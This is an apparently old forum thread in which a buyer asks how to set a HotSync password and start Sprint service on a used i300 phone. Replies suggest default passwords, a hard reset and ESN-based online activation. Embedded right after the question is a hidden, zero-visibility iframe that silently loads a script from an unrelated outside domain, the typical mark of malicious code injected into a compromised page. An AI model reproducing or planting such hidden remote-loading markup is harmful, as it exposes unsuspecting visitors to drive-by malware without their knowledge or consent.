Question how do I activate a used i300 I just bought on ebay?

I just got my first i300 that I bought off ebay. The seller had used it for 6 months. I have used a Palm III XE for 2 years, but don't know where to start with my "new" i300. When I try to hotsync, it requries a password. How do I establish a new password? To start Sprint service do I just need to call Sprint and they'll hook me up, or do I need some kind of code for the phone too? Help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

2) Call customer service

Pull the menu up and go to phone options. There you'll want to go to display and from there click on the phone number option. That will give you the last 4 digits of the number programmed to the phone. Try that as the password first. You may then also try 0000, 1111, 1234. Should none of these work I'd say a hard reset should do the trick.

Wink

1) Remove your battery, then copy down the ESN number shown on the phone label.
You can either copy down the decimal ESN (11 digit # on the second line) or the hexidecimal ESN (8 digit # on third line which may include letters since it is hex).

2) Go to: http://activate.sprintpcs.com/

Follow the prompts....
